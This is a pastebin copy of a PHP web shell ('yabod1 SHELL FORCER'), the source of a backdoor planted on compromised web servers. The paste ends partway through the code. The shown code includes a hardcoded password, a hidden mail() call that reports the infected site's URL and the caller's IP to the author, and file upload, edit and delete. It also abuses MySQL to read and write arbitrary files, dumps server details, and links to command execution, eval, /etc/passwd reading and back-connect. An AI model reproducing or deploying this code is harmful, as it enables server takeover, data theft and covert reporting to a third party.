· 5 years ago · Feb 13, 2020, 12:48 PM
1<?php
2/****************************************\
3|* yabod1 SHELL FORCER - VERSION 2.1 *|
4|* Edit & Develop by yabod1 *|
5|* http://YaBoD1.com *|
6|* == Hacking & Security == *|
7\****************************************/
8
9error_reporting(7);
10@set_magic_quotes_runtime(0);
11ob_start();
12$mtime = explode(' ', microtime());
13$starttime = $mtime[1] + $mtime[0];
14define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/');
15//define('IS_WIN', strstr(PHP_OS, 'WIN') ? 1 : 0 );
16define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
17define('IS_COM', class_exists('COM') ? 1 : 0 );
18define('IS_GPC', get_magic_quotes_gpc());
19$dis_func = get_cfg_var('disable_functions');
20define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 );
21@set_time_limit(0);
22
23foreach(array('_GET','_POST') as $_request) {
24 foreach($$_request as $_key => $_value) {
25 if ($_key{0} != '_') {
26 if (IS_GPC) {
27 $_value = s_array($_value);
28 }
29 $$_key = $_value;
30 }
31 }
32}
33
34/*================= Info Login ================*/
35$admin = array();
36$admin['check'] = true;
37$admin['pass'] = 'zilli'; // Password login
38$admin['cookiepre'] = '';
39$admin['cookiedomain'] = '';
40$admin['cookiepath'] = '/';
41$admin['cookielife'] = 86400;
42/*===================== End =====================*/
43
44if ($charset == 'utf8') {
45 header("content-Type: text/html; charset=utf-8");
46} elseif ($charset == 'big5') {
47 header("content-Type: text/html; charset=big5");
48} elseif ($charset == 'gbk') {
49 header("content-Type: text/html; charset=gbk");
50} elseif ($charset == 'latin1') {
51 header("content-Type: text/html; charset=iso-8859-2");
52}
53
54$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
55$timestamp = time();
56
57/*===================== Login =====================*/
58if ($action == "logout") {
59 scookie('tmtpass', '', -86400 * 365);
60 p('<meta http-equiv="refresh" content="0;URL='.$self.'">');
61 p('<body background=>');
62 exit;
63}
64if($admin['check']) {
65 if ($doing == 'login') {
66 if ($admin['pass'] == $password) {
67 scookie('tmtpass', $password);
68
69// Function mail Sender to my Email - Please remove this before you using this shell code, Thanks -
70$time_shell = "".date("d/m/Y - H:i:s")."";
71$ip_remote = $_SERVER["REMOTE_ADDR"];
72$from_shellcode = 'shell@'.gethostbyname($_SERVER['SERVER_NAME']).'';
73$to_email = '133';
74$server_mail = "".gethostbyname($_SERVER['SERVER_NAME'])." - ".$_SERVER['HTTP_HOST']."";
75$linkcr = "Link: ".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']." - IP Excuting: $ip_remote - Time: $time_shell";
76$header = "From: $from_shellcode\r\nReply-to: $from_shellcode";
77@mail($to_email, $server_mail, $linkcr, $header);
78 p('<meta http-equiv="refresh" content="2;URL='.$self.'">');
79 p('<body background=>
80<BR><BR><div align=center><font color=yellow face=tahoma size=2>Welcome back! yabod1.COM\'s Member - Please wait...<BR><img src=http://i382.photobucket.com/albums/oo263/vnhacker/loading.gif></div>');
81 exit;
82 }
83
84 else
85 {
86 $err_mess = '<table width=100%><tr><td bgcolor=#0E0E0E width=100% height=24><div align=center><font color=red face=tahoma size=2><blink>Password incorrect, Please try again!!!</blink><BR></font></div></td></tr></table>';
87echo $err_mess;
88 }}
89 if ($_COOKIE['tmtpass']) {
90 if ($_COOKIE['tmtpass'] != $admin['pass']) {
91 loginpage();
92 }
93 } else {
94 loginpage();
95 }
96}
97/*===================== Login =====================*/
98
99$errmsg = '';
100
101if ($action == 'phpinfo') {
102 if (IS_PHPINFO) {
103 phpinfo();
104 } else {
105 $errmsg = 'phpinfo() function has non-permissible';
106 }
107}
108
109
110if ($doing == 'downfile' && $thefile) {
111 if (!@file_exists($thefile)) {
112 $errmsg = 'The file you want Downloadable was nonexistent';
113 } else {
114 $fileinfo = pathinfo($thefile);
115 header('Content-type: application/x-'.$fileinfo['extension']);
116 header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
117 header('Content-Length: '.filesize($thefile));
118 @readfile($thefile);
119 exit;
120 }
121}
122
123
124if ($doing == 'backupmysql' && !$saveasfile) {
125 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
126 $table = array_flip($table);
127 $result = q("SHOW tables");
128 if (!$result) p('<h2>'.mysql_error().'</h2>');
129 $filename = basename($_SERVER['HTTP_HOST'].'_MySQL.sql');
130 header('Content-type: application/unknown');
131 header('Content-Disposition: attachment; filename='.$filename);
132 $mysqldata = '';
133 while ($currow = mysql_fetch_array($result)) {
134 if (isset($table[$currow[0]])) {
135 $mysqldata .= sqldumptable($currow[0]);
136 }
137 }
138 mysql_close();
139 exit;
140}
141
142// Mysql
143if($doing=='mysqldown'){
144 if (!$dbname) {
145 $errmsg = 'Please input dbname';
146 } else {
147 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
148 if (!file_exists($mysqldlfile)) {
149 $errmsg = 'The file you want Downloadable was nonexistent';
150 } else {
151 $result = q("select load_file('$mysqldlfile');");
152 if(!$result){
153 q("DROP TABLE IF EXISTS tmp_angel;");
154 q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
155 //Download SQL
156 q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';");
157 $result = q("select content from tmp_angel");
158 q("DROP TABLE tmp_angel");
159 }
160 $row = @mysql_fetch_array($result);
161 if (!$row) {
162 $errmsg = 'Load file failed '.mysql_error();
163 } else {
164 $fileinfo = pathinfo($mysqldlfile);
165 header('Content-type: application/x-'.$fileinfo['extension']);
166 header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
167 header("Accept-Length: ".strlen($row[0]));
168 echo $row[0];
169 exit;
170 }
171 }
172 }
173}
174
175?>
176<html>
177<head>
178<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
179<title><?php echo str_replace('.','','yabod1. SHELL. - . E.d.i.t.e.d. b.y. yabod1 - b4@live[dot]fr');?></title>
180<style type="text/css">
181body,td{font: 10pt Tahoma;color:gray;line-height: 16px;}
182
183a {color: #74A202;text-decoration:none;}
184a:hover{color: #f00;text-decoration:underline;}
185.alt1 td{border-top:1px solid gray;border-bottom:1px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
186.alt2 td{border-top:1px solid gray;border-bottom:1px solid gray;background:#f9f9f9;padding:5px 10px 5px 5px;}
187.focus td{border-top:1px solid gray;border-bottom:0px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
188.fout1 td{border-top:1px solid gray;border-bottom:0px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
189.fout td{border-top:1px solid gray;border-bottom:0px solid gray;background:#202020;padding:5px 10px 5px 5px;}
190.head td{border-top:1px solid gray;border-bottom:1px solid gray;background:#202020;padding:5px 10px 5px 5px;font-weight:bold;}
191.head_small td{border-top:1px solid gray;border-bottom:1px solid gray;background:#202020;padding:5px 10px 5px 5px;font-weight:normal;font-size:8pt;}
192.head td span{font-weight:normal;}
193form{margin:0;padding:0;}
194h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
195ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
196u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
197input, textarea, button
198{
199 font-size: 9pt;
200 color: #ccc;
201 font-family: verdana, sans-serif;
202 background-color: #202020;
203 border-left: 1px solid #74A202;
204 border-top: 1px solid #74A202;
205 border-right: 1px solid #74A202;
206 border-bottom: 1px solid #74A202;
207}
208select
209{
210 font-size: 8pt;
211 font-weight: normal;
212 color: #ccc;
213 font-family: verdana, sans-serif;
214 background-color: #202020;
215}
216
217</style>
218<script type="text/javascript">
219function CheckAll(form) {
220 for(var i=0;i<form.elements.length;i++) {
221 var e = form.elements[i];
222 if (e.name != 'chkall')
223 e.checked = form.chkall.checked;
224 }
225}
226function $(id) {
227 return document.getElementById(id);
228}
229function goaction(act){
230 $('goaction').action.value=act;
231 $('goaction').submit();
232}
233</script>
234</head>
235<body onLoad="init()" style="margin:0;table-layout:fixed; word-break:break-all" bgcolor=black background=http://i382.photobucket.com/albums/oo263/vnhacker/bg-1.jpg>
236
237
238<div border="0" style="position:fixed; width: 100%; height: 25px; z-index: 1; top: 300px; left: 0;" id="loading" align="center" valign="center">
239 <table border="1" width="110px" cellspacing="0" cellpadding="0" style="border-collapse: collapse" bordercolor="#003300">
240 <tr>
241 <td align="center" valign=center>
242 <div border="1" style="background-color: #0E0E0E; filter: alpha(opacity=70); opacity: .7; width: 110px; height: 25px; z-index: 1; border-collapse: collapse;" bordercolor="#006600" align="center">
243 Loading<img src="http://i382.photobucket.com/albums/oo263/vnhacker/loading.gif">
244 </div>
245 </td>
246 </tr>
247 </table>
248 </div>
249 <script>
250 var ld=(document.all);
251 var ns4=document.layers;
252 var ns6=document.getElementById&&!document.all;
253 var ie4=document.all;
254 if (ns4)
255 ld=document.loading;
256 else if (ns6)
257 ld=document.getElementById("loading").style;
258 else if (ie4)
259 ld=document.all.loading.style;
260 function init()
261 {
262 if(ns4){ld.visibility="hidden";}
263 else if (ns6||ie4) ld.display="none";
264 }
265 </script>
266
267
268
269
270<table width="100%" border="0" cellpadding="0" cellspacing="0">
271 <tr class="head_small">
272 <td width=100%>
273 <table width=100%><tr class="head_small"><td width=86px><a title="yabod1 Shell" href="<?php $self;?>"><img src=http://img02.arabsh.com/uploads/image/2012/05/18/0e35434d60f305.png height=86 border=0></a></td><td>
274 <span style="float:right;"> <?php echo "Hostname: ".$_SERVER['HTTP_HOST']."";?> | <a href="http://YaBoD1.com" target="_blank"><?php echo str_replace('.','','V.B.A. T.e.a.m');?> Version 2.2</a> | <a href="javascript:goaction('logout');"><font color=red>Logout</font></a></span>
275
276 <?php
277 $curl_on = @function_exists('curl_version');
278 $mysql_on = @function_exists('mysql_connect');
279 $mssql_on = @function_exists('mssql_connect');
280 $pg_on = @function_exists('pg_connect');
281 $ora_on = @function_exists('ocilogon');
282
283echo (($safe_mode)?("Safe_mod: <b><font color=green>ON</font></b> - "):("Safe_mod: <b><font color=red>OFF</font></b> - "));
284echo "PHP version: <b>".@phpversion()."</b> - ";
285 echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b> - "):("<b><font color=red>OFF</font></b> - "));
286 echo "MySQL: <b>";
287$mysql_on = @function_exists('mysql_connect');
288if($mysql_on){
289echo "<font color=green>ON</font></b> - "; } else { echo "<font color=red>OFF</font></b> - "; }
290echo "MSSQL: <b>";
291$mssql_on = @function_exists('mssql_connect');
292if($mssql_on){echo "<font color=green>ON</font></b> - ";}else{echo "<font color=red>OFF</font></b> - ";}
293echo "PostgreSQL: <b>";
294$pg_on = @function_exists('pg_connect');
295if($pg_on){echo "<font color=green>ON</font></b> - ";}else{echo "<font color=red>OFF</font></b> - ";}
296echo "Oracle: <b>";
297$ora_on = @function_exists('ocilogon');
298if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b><BR>";}
299
300echo "Disable functions : <b>";
301if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b><BR>";}else{echo "<font color=red>$df</font></b><BR>";}
302
303echo "<font color=white>Uname -a</font>: ".@substr(@php_uname(),0,120)."<br>";
304echo "<font color=white>Server</font>: ".@substr($SERVER_SOFTWARE,0,120)." - <font color=white>id</font>: ".@getmyuid()."(".@get_current_user().") - uid=".@getmyuid()." (".@get_current_user().") gid=".@getmygid()."(".@get_current_user().")<br>";
305 ?>
306 </td></tr></table></td>
307 </tr>
308 <tr class="alt1">
309 <td width=100%><span style="float:right;">[Server IP: <?php echo "<font color=yellow>".gethostbyname($_SERVER['SERVER_NAME'])."</font>";?> - Your IP: <?php echo "<font color=yellow>".$_SERVER['REMOTE_ADDR']."</font>";?>] </span>
310
311 <a href="javascript:goaction('file');">File Manager</a> |
312 <a href="javascript:goaction('sqladmin');">MySQL Manager</a> |
313 <a href="javascript:goaction('sqlfile');">MySQL Upload & Download</a> |
314 <a href="javascript:goaction('shell');">Execute Command</a> |
315 <a href="javascript:goaction('phpenv');">PHP Variable</a> |
316 <a href="javascript:goaction('eval');">Eval PHP Code</a>
317 <?php if (!IS_WIN) {?> | <a href="javascript:goaction('brute');">Brute</a> <?php }?>
318 <?php if (!IS_WIN) {?> | <a href="javascript:goaction('etcpwd');">/etc/passwd</a> <?php }?>
319 <?php if (!IS_WIN) {?> | <a href="javascript:goaction('backconnect');">Back Connect</a><?php }?>
320 </td>
321 </tr>
322</table>
323<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
324<?php
325
326formhead(array('name'=>'goaction'));
327makehide('action');
328formfoot();
329
330$errmsg && m($errmsg);
331
332// Dir function
333!$dir && $dir = '.';
334$nowpath = getPath(SA_ROOT, $dir);
335if (substr($dir, -1) != '/') {
336 $dir = $dir.'/';
337}
338$uedir = ue($dir);
339
340if (!$action || $action == 'file') {
341
342 // Non-writeable
343 $dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';
344
345 // Delete dir
346 if ($doing == 'deldir' && $thefile) {
347 if (!file_exists($thefile)) {
348 m($thefile.' directory does not exist');
349 } else {
350 m('Directory delete '.(deltree($thefile) ? basename($thefile).' success' : 'failed'));
351 }
352 }
353
354 // Create new dir
355 elseif ($newdirname) {
356 $mkdirs = $nowpath.$newdirname;
357 if (file_exists($mkdirs)) {
358 m('Directory has already existed');
359 } else {
360 m('Directory created '.(@mkdir($mkdirs,0777) ? 'success' : 'failed'));
361 @chmod($mkdirs,0777);
362 }
363 }
364
365 // Upload file
366 elseif ($doupfile) {
367 m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));
368 }
369
370 // Edit file
371 elseif ($editfilename && $filecontent) {
372 $fp = @fopen($editfilename,'w');
373 m('Save file '.(@fwrite($fp,$filecontent) ? 'success' : 'failed'));
374 @fclose($fp);
375 }
376
377 // Modify
378 elseif ($pfile && $newperm) {
379 if (!file_exists($pfile)) {
380 m('The original file does not exist');
381 } else {
382 $newperm = base_convert($newperm,8,10);
383 m('Modify file attributes '.(@chmod($pfile,$newperm) ? 'success' : 'failed'));
384 }
385 }
386
387 // Rename
388 elseif ($oldname && $newfilename) {
389 $nname = $nowpath.$newfilename;
390 if (file_exists($nname) || !file_exists($oldname)) {
391 m($nname.' has already existed or original file does not exist');
392 } else {
393 m(basename($oldname).' renamed '.basename($nname).(@rename($oldname,$nname) ? ' success' : 'failed'));
394 }
395 }
396
397 // Copu
398 elseif ($sname && $tofile) {
399 if (file_exists($tofile) || !file_exists($sname)) {
400 m('The goal file has already existed or original file does not exist');
401 } else {
402 m(basename($tofile).' copied '.(@copy($sname,$tofile) ? basename($tofile).' success' : 'failed'));
403 }
404 }
405
406 // File exit
407 elseif ($curfile && $tarfile) {
408 if (!@file_exists($curfile) || !@file_exists($tarfile)) {
409 m('The goal file has already existed or original file does not exist');
410 } else {
411 $time = @filemtime($tarfile);
412 m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
413 }
414 }
415
416 // Date
417 elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
418 if (!@file_exists($curfile)) {
419 m(basename($curfile).' does not exist');
420 } else {
421 $time = strtotime("$year-$month-$day $hour:$minute:$second");
422 m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
423 }
424 }
425
426 // Download
427 elseif($doing == 'downrar') {
428 if ($dl) {
429 $dfiles='';
430 foreach ($dl as $filepath => $value) {
431 $dfiles.=$filepath.',';
432 }
433 $dfiles=substr($dfiles,0,strlen($dfiles)-1);
434 $dl=explode(',',$dfiles);
435 $zip=new PHPZip($dl);
436 $code=$zip->out;
437 header('Content-type: application/octet-stream');
438 header('Accept-Ranges: bytes');
439 header('Accept-Length: '.strlen($code));
440 header('Content-Disposition: attachment;filename='.$_SERVER['HTTP_HOST'].'_Files.tar.gz');
441 echo $code;
442 exit;
443 } else {
444 m('Please select file(s)');
445 }
446 }
447
448 // Delete file
449 elseif($doing == 'delfiles') {
450 if ($dl) {
451 $dfiles='';
452 $succ = $fail = 0;
453 foreach ($dl as $filepath => $value) {
454 if (@unlink($filepath)) {
455 $succ++;
456 } else {
457 $fail++;
458 }
459 }
460 m('Deleted file have finished��choose '.count($dl).' success '.$succ.' fail '.$fail);
461 } else {
462 m('Please select file(s)');
463 }
464 }
465
466 // Function Newdir
467 formhead(array('name'=>'createdir'));
468 makehide('newdirname');
469 makehide('dir',$nowpath);
470 formfoot();
471 formhead(array('name'=>'fileperm'));
472 makehide('newperm');
473 makehide('pfile');
474 makehide('dir',$nowpath);
475 formfoot();
476 formhead(array('name'=>'copyfile'));
477 makehide('sname');
478 makehide('tofile');
479 makehide('dir',$nowpath);
480 formfoot();
481 formhead(array('name'=>'rename'));
482 makehide('oldname');
483 makehide('newfilename');
484 makehide('dir',$nowpath);
485 formfoot();
486 formhead(array('name'=>'fileopform'));
487 makehide('action');
488 makehide('opfile');
489 makehide('dir');
490 formfoot();
491
492 $free = @disk_free_space($nowpath);
493 !$free && $free = 0;
494 $all = @disk_total_space($nowpath);
495 !$all && $all = 0;
496 $used = $all-$free;
497 $used_percent = @round(100/($all/$free),2);
498 p('<font color=yellow face=tahoma size=2><B>File Manager</b> </font> Current disk free <font color=red>'.sizecount($free).'</font> of <font color=red>'.sizecount($all).'</font> (<font color=red>'.$used_percent.'</font>%)</font>');
499
500?>
501<table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
502 <form action="" method="post" id="godir" name="godir">
503 <tr>
504 <td nowrap>Current Directory (<?php echo $dir_writeable;?>, <?php echo getChmod($nowpath);?>)</td>
505 <td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath;?>" type="text" style="width:100%;margin:0 8px;"></td>
506 <td nowrap><input class="bt" value="GO" type="submit"></td>
507 </tr>
508 </form>
509</table>
510<script type="text/javascript">
511function createdir(){
512 var newdirname;
513 newdirname = prompt('Please input the directory name:', '');
514 if (!newdirname) return;
515 $('createdir').newdirname.value=newdirname;
516 $('createdir').submit();
517}
518function fileperm(pfile){
519 var newperm;
520 newperm = prompt('Current file:'+pfile+'\nPlease input new attribute:', '');
521 if (!newperm) return;
522 $('fileperm').newperm.value=newperm;
523 $('fileperm').pfile.value=pfile;
524 $('fileperm').submit();
525}
526function copyfile(sname){
527 var tofile;
528 tofile = prompt('Original file:'+sname+'\nPlease input object file (fullpath):', '');
529 if (!tofile) return;
530 $('copyfile').tofile.value=tofile;
531 $('copyfile').sname.value=sname;
532 $('copyfile').submit();
533}
534function rename(oldname){
535 var newfilename;
536 newfilename = prompt('Former file name:'+oldname+'\nPlease input new filename:', '');
537 if (!newfilename) return;
538 $('rename').newfilename.value=newfilename;
539 $('rename').oldname.value=oldname;
540 $('rename').submit();
541}
542function dofile(doing,thefile,m){
543 if (m && !confirm(m)) {
544 return;
545 }
546 $('filelist').doing.value=doing;
547 if (thefile){
548 $('filelist').thefile.value=thefile;
549 }
550 $('filelist').submit();
551}
552function createfile(nowpath){
553 var filename;
554 filename = prompt('Please input the file name:', '');
555 if (!filename) return;
556 opfile('editfile',nowpath + filename,nowpath);
557}
558function opfile(action,opfile,dir){
559 $('fileopform').action.value=action;
560 $('fileopform').opfile.value=opfile;
561 $('fileopform').dir.value=dir;
562 $('fileopform').submit();
563}
564function godir(dir,view_writable){
565 if (view_writable) {
566 $('godir').view_writable.value=1;
567 }
568 $('godir').dir.value=dir;
569 $('godir').submit();
570}
571</script>
572 <?php
573 tbhead();
574 p('<form action="'.$self.'" method="POST" enctype="multipart/form-data"><tr class="alt1"><td colspan="7" style="padding:5px;">');
575 p('<div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="'.$dir.'" type="hidden" /><input name="dir" value="'.$dir.'" type="hidden" /></div>');
576 p('<a href="javascript:godir(\''.$_SERVER["DOCUMENT_ROOT"].'\');">WebRoot</a>');
577 if ($view_writable) {
578 p(' | <a href="javascript:godir(\''.$nowpath.'\');">View All</a>');
579 } else {
580 p(' | <a href="javascript:godir(\''.$nowpath.'\',\'1\');">View Writable</a>');
581 }
582 p(' | <a href="javascript:createdir();">Create Directory</a> | <a href="javascript:createfile(\''.$nowpath.'\');">Create File</a>');
583 if (IS_WIN && IS_COM) {
584 $obj = new COM('scripting.filesystemobject');
585 if ($obj && is_object($obj)) {
586 $DriveTypeDB = array(0 => 'Unknow',1 => 'Removable',2 => 'Fixed',3 => 'Network',4 => 'CDRom',5 => 'RAM Disk');
587 foreach($obj->Drives as $drive) {
588 if ($drive->DriveType == 2) {
589 p(' | <a href="javascript:godir(\''.$drive->Path.'/\');" title="Size:'.sizecount($drive->TotalSize).' Free:'.sizecount($drive->FreeSpace).' Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
590 } else {
591 p(' | <a href="javascript:godir(\''.$drive->Path.'/\');" title="Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
592 }
593 }
594 }
595 }
596
597 p('</td></tr></form>');
598
599 p('<tr class="head"><td> </td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');
600
601 // Get path
602 $dirdata=array();
603 $filedata=array();
604
605 if ($view_writable) {
606 $dirdata = GetList($nowpath);
607 } else {
608 // Open dir
609 $dirs=@opendir($dir);
610 while ($file=@readdir($dirs)) {
611 $filepath=$nowpath.$file;
612 if(@is_dir($filepath)){
613 $dirdb['filename']=$file;
614 $dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
615 $dirdb['dirchmod']=getChmod($filepath);
616 $dirdb['dirperm']=getPerms($filepath);
617 $dirdb['fileowner']=getUser($filepath);
618 $dirdb['dirlink']=$nowpath;
619 $dirdb['server_link']=$filepath;
620 $dirdb['client_link']=ue($filepath);
621 $dirdata[]=$dirdb;
622 } else {
623 $filedb['filename']=$file;
624 $filedb['size']=sizecount(@filesize($filepath));
625 $filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
626 $filedb['filechmod']=getChmod($filepath);
627 $filedb['fileperm']=getPerms($filepath);
628 $filedb['fileowner']=getUser($filepath);
629 $filedb['dirlink']=$nowpath;
630 $filedb['server_link']=$filepath;
631 $filedb['client_link']=ue($filepath);
632 $filedata[]=$filedb;
633 }
634 }// while
635 unset($dirdb);
636 unset($filedb);
637 @closedir($dirs);
638 }
639 @sort($dirdata);
640 @sort($filedata);
641 $dir_i = '0';
642 foreach($dirdata as $key => $dirdb){
643 if($dirdb['filename']!='..' && $dirdb['filename']!='.') {
644 $thisbg = bg();
645 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
646 p('<td width="2%" nowrap><font face="wingdings" size="3">0</font></td>');
647 p('<td><a href="javascript:godir(\''.$dirdb['server_link'].'\');">'.$dirdb['filename'].'</a></td>');
648 p('<td nowrap>'.$dirdb['mtime'].'</td>');
649 p('<td nowrap>--</td>');
650 p('<td nowrap>');
651 p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirchmod'].'</a> / ');
652 p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirperm'].'</a>'.$dirdb['fileowner'].'</td>');
653 p('<td nowrap><a href="javascript:dofile(\'deldir\',\''.$dirdb['server_link'].'\',\'Are you sure will delete '.$dirdb['filename'].'? \\n\\nIf non-empty directory, will be delete all the files.\')">Del</a> | <a href="javascript:rename(\''.$dirdb['server_link'].'\');">Rename</a></td>');
654 p('</tr>');
655 $dir_i++;
656 } else {
657 if($dirdb['filename']=='..') {
658 p('<tr class=fout>');
659 p('<td align="center"><font face="Wingdings 3" size=4>=</font></td><td nowrap colspan="5"><a href="javascript:godir(\''.getUpPath($nowpath).'\');">Parent Directory</a></td>');
660 p('</tr>');
661 }
662 }
663 }
664
665 p('<tr bgcolor="green" stlye="border-top:1px solid gray;border-bottom:1px solid gray;"><td colspan="6" height="5"></td></tr>');
666 p('<form id="filelist" name="filelist" action="'.$self.'" method="post">');
667 makehide('action','file');
668 makehide('thefile');
669 makehide('doing');
670 makehide('dir',$nowpath);
671 $file_i = '0';
672 foreach($filedata as $key => $filedb){
673 if($filedb['filename']!='..' && $filedb['filename']!='.') {
674 $fileurl = str_replace(SA_ROOT,'',$filedb['server_link']);
675 $thisbg = bg();
676 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
677 p('<td width="2%" nowrap><input type="checkbox" value="1" name="dl['.$filedb['server_link'].']"></td>');
678 p('<td><a href="'.$fileurl.'" target="_blank">'.$filedb['filename'].'</a></td>');
679 p('<td nowrap>'.$filedb['mtime'].'</td>');
680 p('<td nowrap>'.$filedb['size'].'</td>');
681 p('<td nowrap>');
682 p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['filechmod'].'</a> / ');
683 p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['fileperm'].'</a>'.$filedb['fileowner'].'</td>');
684 p('<td nowrap>');
685 p('<a href="javascript:dofile(\'downfile\',\''.$filedb['server_link'].'\');">Down</a> | ');
686 p('<a href="javascript:copyfile(\''.$filedb['server_link'].'\');">Copy</a> | ');
687 p('<a href="javascript:opfile(\'editfile\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Edit</a> | ');
688 p('<a href="javascript:rename(\''.$filedb['server_link'].'\');">Rename</a> | ');
689 p('<a href="javascript:opfile(\'newtime\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Time</a>');
690 p('</td></tr>');
691 $file_i++;
692 }
693 }
694 p('<tr class="fout1"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td><a href="javascript:dofile(\'downrar\');">Packing download selected</a> - <a href="javascript:dofile(\'delfiles\');">Delete selected</a></td><td colspan="4" align="right">'.$dir_i.' directories / '.$file_i.' files</td></tr>');
695 p('</form></table>');
696}// end dir
697
698elseif ($action == 'sqlfile') {
699 if($doing=="mysqlupload"){
700 $file = $_FILES['uploadfile'];
701 $filename = $file['tmp_name'];
702 if (file_exists($savepath)) {
703 m('The goal file has already existed');
704 } else {
705 if(!$filename) {
706 m('Please choose a file');
707 } else {
708 $fp=@fopen($filename,'r');
709 $contents=@fread($fp, filesize($filename));
710 @fclose($fp);
711 $contents = bin2hex($contents);
712 if(!$upname) $upname = $file['name'];
713 dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
714 $result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';");
715 m($result ? 'Upload success' : 'Upload has failed: '.mysql_error());
716 }
717 }
718 }
719?>
720<script type="text/javascript">
721function mysqlfile(doing){
722 if(!doing) return;
723 $('doing').value=doing;
724 $('mysqlfile').dbhost.value=$('dbinfo').dbhost.value;
725 $('mysqlfile').dbport.value=$('dbinfo').dbport.value;
726 $('mysqlfile').dbuser.value=$('dbinfo').dbuser.value;
727 $('mysqlfile').dbpass.value=$('dbinfo').dbpass.value;
728 $('mysqlfile').dbname.value=$('dbinfo').dbname.value;
729 $('mysqlfile').charset.value=$('dbinfo').charset.value;
730 $('mysqlfile').submit();
731}
732</script>
733<?php
734 !$dbhost && $dbhost = 'localhost';
735 !$dbuser && $dbuser = 'root';
736 !$dbport && $dbport = '3306';
737 $charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1');
738 formhead(array('title'=>'MYSQL Information','name'=>'dbinfo'));
739 makehide('action','sqlfile');
740 p('<p>');
741 p('DBHost:');
742 makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
743 p(':');
744 makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
745 p('DBUser:');
746 makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
747 p('DBPass:');
748 makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
749 p('DBName:');
750 makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname));
751 p('DBCharset:');
752 makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset));
753 p('</p>');
754 formfoot();
755 p('<form action="'.$self.'" method="POST" enctype="multipart/form-data" name="mysqlfile" id="mysqlfile">');
756 p('<h2>Upload file</h2>');
757 p('<p><b>This operation the DB user must has FILE privilege</b></p>');
758 p('<p>Save path(fullpath): <input class="input" name="savepath" size="45" type="text" /> Choose a file: <input class="input" name="uploadfile" type="file" /> <a href="javascript:mysqlfile(\'mysqlupload\');">Upload</a></p>');
759 p('<h2>Download file</h2>');
760 p('<p>File: <input class="input" name="mysqldlfile" size="115" type="text" /> <a href="javascript:mysqlfile(\'mysqldown\');">Download</a></p>');
761 makehide('dbhost');
762 makehide('dbport');
763 makehide('dbuser');
764 makehide('dbpass');
765 makehide('dbname');
766 makehide('charset');
767 makehide('doing');
768 makehide('action','sqlfile');
769 p('</form>');
770}
771
772elseif ($action == 'sqladmin') {
773 !$dbhost && $dbhost = 'localhost';
774 !$dbuser && $dbuser = 'root';
775 !$dbport && $dbport = '3306';
776 $dbform = '<input type="hidden" id="connect" name="connect" value="1" />';
777 if(isset($dbhost)){
